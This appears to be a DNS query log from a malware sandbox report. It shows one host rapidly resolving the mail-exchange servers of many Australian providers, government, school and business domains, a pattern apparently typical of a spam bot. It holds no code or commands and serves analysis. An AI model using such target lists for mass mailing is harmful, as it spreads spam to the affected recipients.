                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:55.956604958 CET8.8.8.8192.168.2.30x9199No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:55.956604958 CET8.8.8.8192.168.2.30x9199No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:55.978518009 CET8.8.8.8192.168.2.30x6fccNo error (0)mta5.am0.yahoodns.net67.195.228.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:55.978518009 CET8.8.8.8192.168.2.30x6fccNo error (0)mta5.am0.yahoodns.net98.136.96.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:55.978518009 CET8.8.8.8192.168.2.30x6fccNo error (0)mta5.am0.yahoodns.net67.195.228.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:55.978518009 CET8.8.8.8192.168.2.30x6fccNo error (0)mta5.am0.yahoodns.net67.195.204.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:55.978518009 CET8.8.8.8192.168.2.30x6fccNo error (0)mta5.am0.yahoodns.net98.136.96.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:55.978518009 CET8.8.8.8192.168.2.30x6fccNo error (0)mta5.am0.yahoodns.net98.136.96.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:55.978518009 CET8.8.8.8192.168.2.30x6fccNo error (0)mta5.am0.yahoodns.net67.195.228.111A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:55.978518009 CET8.8.8.8192.168.2.30x6fccNo error (0)mta5.am0.yahoodns.net67.195.204.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:56.022532940 CET8.8.8.8192.168.2.30x4649No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:56.022532940 CET8.8.8.8192.168.2.30x4649No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:56.022532940 CET8.8.8.8192.168.2.30x4649No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:56.045475006 CET8.8.8.8192.168.2.30xf996No error (0)mta6.am0.yahoodns.net67.195.228.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:56.045475006 CET8.8.8.8192.168.2.30xf996No error (0)mta6.am0.yahoodns.net67.195.228.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:56.045475006 CET8.8.8.8192.168.2.30xf996No error (0)mta6.am0.yahoodns.net67.195.228.94A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:56.045475006 CET8.8.8.8192.168.2.30xf996No error (0)mta6.am0.yahoodns.net67.195.228.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:56.045475006 CET8.8.8.8192.168.2.30xf996No error (0)mta6.am0.yahoodns.net67.195.204.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:56.045475006 CET8.8.8.8192.168.2.30xf996No error (0)mta6.am0.yahoodns.net98.136.96.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:56.045475006 CET8.8.8.8192.168.2.30xf996No error (0)mta6.am0.yahoodns.net98.136.96.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:56.045475006 CET8.8.8.8192.168.2.30xf996No error (0)mta6.am0.yahoodns.net67.195.204.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:56.099481106 CET8.8.8.8192.168.2.30x72c2No error (0)iinet.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:56.099481106 CET8.8.8.8192.168.2.30x72c2No error (0)iinet.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:56.120492935 CET8.8.8.8192.168.2.30xf81bNo error (0)asav2.iinet.net.au27.32.32.49A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:56.177436113 CET8.8.8.8192.168.2.30x3fd5No error (0)abs.gov.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:56.206727028 CET8.8.8.8192.168.2.30x98fcNo error (0)mail.abs.gov.au144.53.192.125A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:56.225188971 CET8.8.8.8192.168.2.30xf07dNo error (0)tpg.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:56.244580984 CET8.8.8.8192.168.2.30xc17aNo error (0)asav.tpg.com.au27.32.32.10A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:56.302409887 CET8.8.8.8192.168.2.30xb35eNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:56.302409887 CET8.8.8.8192.168.2.30xb35eNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:56.302409887 CET8.8.8.8192.168.2.30xb35eNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:56.331008911 CET8.8.8.8192.168.2.30x7cf5No error (0)mta6.am0.yahoodns.net67.195.204.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:56.331008911 CET8.8.8.8192.168.2.30x7cf5No error (0)mta6.am0.yahoodns.net67.195.204.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:56.331008911 CET8.8.8.8192.168.2.30x7cf5No error (0)mta6.am0.yahoodns.net67.195.228.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:56.331008911 CET8.8.8.8192.168.2.30x7cf5No error (0)mta6.am0.yahoodns.net67.195.204.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:56.331008911 CET8.8.8.8192.168.2.30x7cf5No error (0)mta6.am0.yahoodns.net67.195.228.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:56.331008911 CET8.8.8.8192.168.2.30x7cf5No error (0)mta6.am0.yahoodns.net67.195.228.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:56.331008911 CET8.8.8.8192.168.2.30x7cf5No error (0)mta6.am0.yahoodns.net98.136.96.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:56.331008911 CET8.8.8.8192.168.2.30x7cf5No error (0)mta6.am0.yahoodns.net67.195.204.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:56.397805929 CET8.8.8.8192.168.2.30xe370No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:56.397805929 CET8.8.8.8192.168.2.30xe370No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:56.397805929 CET8.8.8.8192.168.2.30xe370No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:56.434473038 CET8.8.8.8192.168.2.30x1542No error (0)mta6.am0.yahoodns.net67.195.228.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:56.434473038 CET8.8.8.8192.168.2.30x1542No error (0)mta6.am0.yahoodns.net98.136.96.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:56.434473038 CET8.8.8.8192.168.2.30x1542No error (0)mta6.am0.yahoodns.net67.195.204.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:56.434473038 CET8.8.8.8192.168.2.30x1542No error (0)mta6.am0.yahoodns.net67.195.204.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:56.434473038 CET8.8.8.8192.168.2.30x1542No error (0)mta6.am0.yahoodns.net98.136.96.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:56.434473038 CET8.8.8.8192.168.2.30x1542No error (0)mta6.am0.yahoodns.net67.195.228.94A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:56.434473038 CET8.8.8.8192.168.2.30x1542No error (0)mta6.am0.yahoodns.net67.195.228.111A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:56.434473038 CET8.8.8.8192.168.2.30x1542No error (0)mta6.am0.yahoodns.net67.195.204.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:56.519519091 CET8.8.8.8192.168.2.30xb56cName error (3)ad2-one.com.aunonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:56.570197105 CET8.8.8.8192.168.2.30xbaa4No error (0)optusnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:56.592776060 CET8.8.8.8192.168.2.30x37aNo error (0)extmail.optusnet.com.au211.29.133.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:56.898181915 CET8.8.8.8192.168.2.30xa761No error (0)three.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:56.934386015 CET8.8.8.8192.168.2.30x8702Name error (3)stmyalt.melb.catholic.edu.aunonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:56.953223944 CET8.8.8.8192.168.2.30xec7eNo error (0)netspace.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:56.973718882 CET8.8.8.8192.168.2.30x8fa8No error (0)asav.iinet.net.au203.59.218.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:57.015511036 CET8.8.8.8192.168.2.30x8769No error (0)schoolboost.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:57.015511036 CET8.8.8.8192.168.2.30x8769No error (0)schoolboost.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:57.015511036 CET8.8.8.8192.168.2.30x8769No error (0)schoolboost.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:57.015511036 CET8.8.8.8192.168.2.30x8769No error (0)schoolboost.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:57.020266056 CET8.8.8.8192.168.2.30x9d2dNo error (0)mbox.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:57.020266056 CET8.8.8.8192.168.2.30x9d2dNo error (0)mbox.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:57.020266056 CET8.8.8.8192.168.2.30x9d2dNo error (0)mbox.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:57.049877882 CET8.8.8.8192.168.2.30xac92No error (0)mx3.email-hosting.net.au103.252.153.16A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:57.049877882 CET8.8.8.8192.168.2.30xac92No error (0)mx3.email-hosting.net.au103.252.153.11A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:57.050354004 CET8.8.8.8192.168.2.30x137eNo error (0)mx2.fusemail.net72.35.12.4A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:57.205024004 CET8.8.8.8192.168.2.30xc7aNo error (0)smtpin2.three.com.au202.124.68.52A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:57.296228886 CET8.8.8.8192.168.2.30x25cfNo error (0)westnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:57.296228886 CET8.8.8.8192.168.2.30x25cfNo error (0)westnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:57.318706989 CET8.8.8.8192.168.2.30xa368No error (0)asav2.iinet.net.au27.32.32.49A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:57.329509974 CET8.8.8.8192.168.2.30xb5eaNo error (0)ehtravel.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:57.329509974 CET8.8.8.8192.168.2.30xb5eaNo error (0)ehtravel.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:57.352885008 CET8.8.8.8192.168.2.30x6a81No error (0)d501078.b.ess.au.barracudanetworks.com3.24.133.210A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:57.352885008 CET8.8.8.8192.168.2.30x6a81No error (0)d501078.b.ess.au.barracudanetworks.com3.24.133.211A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:57.352885008 CET8.8.8.8192.168.2.30x6a81No error (0)d501078.b.ess.au.barracudanetworks.com3.24.133.209A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:57.363440990 CET8.8.8.8192.168.2.30xe32bNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:57.363440990 CET8.8.8.8192.168.2.30xe32bNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:57.363440990 CET8.8.8.8192.168.2.30xe32bNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:57.382652998 CET8.8.8.8192.168.2.30xc3faNo error (0)mta7.am0.yahoodns.net67.195.204.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:57.382652998 CET8.8.8.8192.168.2.30xc3faNo error (0)mta7.am0.yahoodns.net67.195.228.94A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:57.382652998 CET8.8.8.8192.168.2.30xc3faNo error (0)mta7.am0.yahoodns.net67.195.228.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:57.382652998 CET8.8.8.8192.168.2.30xc3faNo error (0)mta7.am0.yahoodns.net98.136.96.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:57.382652998 CET8.8.8.8192.168.2.30xc3faNo error (0)mta7.am0.yahoodns.net67.195.204.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:57.382652998 CET8.8.8.8192.168.2.30xc3faNo error (0)mta7.am0.yahoodns.net98.136.96.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:57.382652998 CET8.8.8.8192.168.2.30xc3faNo error (0)mta7.am0.yahoodns.net67.195.204.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:57.382652998 CET8.8.8.8192.168.2.30xc3faNo error (0)mta7.am0.yahoodns.net98.136.96.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:57.476830959 CET8.8.8.8192.168.2.30xfbd4No error (0)emmconsult.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:57.476856947 CET8.8.8.8192.168.2.30xa9efNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:57.476856947 CET8.8.8.8192.168.2.30xa9efNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:57.476856947 CET8.8.8.8192.168.2.30xa9efNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:57.496305943 CET8.8.8.8192.168.2.30x1c23No error (0)mta7.am0.yahoodns.net67.195.204.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:57.496305943 CET8.8.8.8192.168.2.30x1c23No error (0)mta7.am0.yahoodns.net67.195.228.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:57.496305943 CET8.8.8.8192.168.2.30x1c23No error (0)mta7.am0.yahoodns.net67.195.228.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:57.496305943 CET8.8.8.8192.168.2.30x1c23No error (0)mta7.am0.yahoodns.net98.136.96.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:57.496305943 CET8.8.8.8192.168.2.30x1c23No error (0)mta7.am0.yahoodns.net98.136.96.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:57.496305943 CET8.8.8.8192.168.2.30x1c23No error (0)mta7.am0.yahoodns.net98.136.96.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:57.496305943 CET8.8.8.8192.168.2.30x1c23No error (0)mta7.am0.yahoodns.net98.136.96.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:57.496305943 CET8.8.8.8192.168.2.30x1c23No error (0)mta7.am0.yahoodns.net67.195.228.111A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:57.569466114 CET8.8.8.8192.168.2.30x874dNo error (0)jaevans.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:57.610753059 CET8.8.8.8192.168.2.30xccedNo error (0)jaevans-com-au.mail.protection.outlook.com104.47.71.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:57.610753059 CET8.8.8.8192.168.2.30xccedNo error (0)jaevans-com-au.mail.protection.outlook.com104.47.71.202A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:57.612629890 CET8.8.8.8192.168.2.30x6e8cNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:57.612629890 CET8.8.8.8192.168.2.30x6e8cNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:57.612629890 CET8.8.8.8192.168.2.30x6e8cNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:57.633054972 CET8.8.8.8192.168.2.30x477bNo error (0)mta5.am0.yahoodns.net98.136.96.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:57.633054972 CET8.8.8.8192.168.2.30x477bNo error (0)mta5.am0.yahoodns.net98.136.96.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:57.633054972 CET8.8.8.8192.168.2.30x477bNo error (0)mta5.am0.yahoodns.net67.195.204.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:57.633054972 CET8.8.8.8192.168.2.30x477bNo error (0)mta5.am0.yahoodns.net98.136.96.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:57.633054972 CET8.8.8.8192.168.2.30x477bNo error (0)mta5.am0.yahoodns.net67.195.228.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:57.633054972 CET8.8.8.8192.168.2.30x477bNo error (0)mta5.am0.yahoodns.net67.195.228.94A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:57.633054972 CET8.8.8.8192.168.2.30x477bNo error (0)mta5.am0.yahoodns.net98.136.96.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:57.633054972 CET8.8.8.8192.168.2.30x477bNo error (0)mta5.am0.yahoodns.net98.136.96.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:57.787986040 CET8.8.8.8192.168.2.30x4d43No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:57.787986040 CET8.8.8.8192.168.2.30x4d43No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:57.787986040 CET8.8.8.8192.168.2.30x4d43No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:57.819858074 CET8.8.8.8192.168.2.30xc1c9No error (0)mta5.am0.yahoodns.net67.195.204.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:57.819858074 CET8.8.8.8192.168.2.30xc1c9No error (0)mta5.am0.yahoodns.net98.136.96.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:57.819858074 CET8.8.8.8192.168.2.30xc1c9No error (0)mta5.am0.yahoodns.net67.195.228.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:57.819858074 CET8.8.8.8192.168.2.30xc1c9No error (0)mta5.am0.yahoodns.net67.195.228.111A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:57.819858074 CET8.8.8.8192.168.2.30xc1c9No error (0)mta5.am0.yahoodns.net67.195.228.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:57.819858074 CET8.8.8.8192.168.2.30xc1c9No error (0)mta5.am0.yahoodns.net67.195.204.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:57.819858074 CET8.8.8.8192.168.2.30xc1c9No error (0)mta5.am0.yahoodns.net67.195.204.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:57.819858074 CET8.8.8.8192.168.2.30xc1c9No error (0)mta5.am0.yahoodns.net67.195.204.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:57.847214937 CET8.8.8.8192.168.2.30x356eNo error (0)swiftdsl.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:57.847214937 CET8.8.8.8192.168.2.30x356eNo error (0)swiftdsl.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:57.870656013 CET8.8.8.8192.168.2.30x9fe3No error (0)ipt-mailgate-01.m2core.com.au203.134.71.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:57.872840881 CET8.8.8.8192.168.2.30xff78No error (0)emmconsult.com.au203.210.102.35A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:57.911566019 CET8.8.8.8192.168.2.30x5a1fNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:57.911566019 CET8.8.8.8192.168.2.30x5a1fNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:57.911566019 CET8.8.8.8192.168.2.30x5a1fNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:57.946363926 CET8.8.8.8192.168.2.30x2277No error (0)mta5.am0.yahoodns.net98.136.96.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:57.946363926 CET8.8.8.8192.168.2.30x2277No error (0)mta5.am0.yahoodns.net67.195.228.111A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:57.946363926 CET8.8.8.8192.168.2.30x2277No error (0)mta5.am0.yahoodns.net67.195.228.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:57.946363926 CET8.8.8.8192.168.2.30x2277No error (0)mta5.am0.yahoodns.net67.195.204.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:57.946363926 CET8.8.8.8192.168.2.30x2277No error (0)mta5.am0.yahoodns.net67.195.228.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:57.946363926 CET8.8.8.8192.168.2.30x2277No error (0)mta5.am0.yahoodns.net67.195.204.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:57.946363926 CET8.8.8.8192.168.2.30x2277No error (0)mta5.am0.yahoodns.net98.136.96.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:57.946363926 CET8.8.8.8192.168.2.30x2277No error (0)mta5.am0.yahoodns.net98.136.96.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:58.117259979 CET8.8.8.8192.168.2.30x75cName error (3)cos.tas.edu.aunonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:58.159738064 CET8.8.8.8192.168.2.30x4714No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:58.159738064 CET8.8.8.8192.168.2.30x4714No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:58.159738064 CET8.8.8.8192.168.2.30x4714No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:58.179841995 CET8.8.8.8192.168.2.30xb339No error (0)mta7.am0.yahoodns.net67.195.204.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:58.179841995 CET8.8.8.8192.168.2.30xb339No error (0)mta7.am0.yahoodns.net98.136.96.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:58.179841995 CET8.8.8.8192.168.2.30xb339No error (0)mta7.am0.yahoodns.net98.136.96.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:58.179841995 CET8.8.8.8192.168.2.30xb339No error (0)mta7.am0.yahoodns.net67.195.204.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:58.179841995 CET8.8.8.8192.168.2.30xb339No error (0)mta7.am0.yahoodns.net98.136.96.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:58.179841995 CET8.8.8.8192.168.2.30xb339No error (0)mta7.am0.yahoodns.net67.195.228.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:58.179841995 CET8.8.8.8192.168.2.30xb339No error (0)mta7.am0.yahoodns.net98.136.96.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:58.179841995 CET8.8.8.8192.168.2.30xb339No error (0)mta7.am0.yahoodns.net67.195.204.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:58.351630926 CET8.8.8.8192.168.2.30x7fe3No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:58.351630926 CET8.8.8.8192.168.2.30x7fe3No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:58.351630926 CET8.8.8.8192.168.2.30x7fe3No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:58.370841026 CET8.8.8.8192.168.2.30xd704No error (0)mta7.am0.yahoodns.net98.136.96.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:58.370841026 CET8.8.8.8192.168.2.30xd704No error (0)mta7.am0.yahoodns.net67.195.204.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:58.370841026 CET8.8.8.8192.168.2.30xd704No error (0)mta7.am0.yahoodns.net67.195.228.106A (IP address)IN (0x0001)false
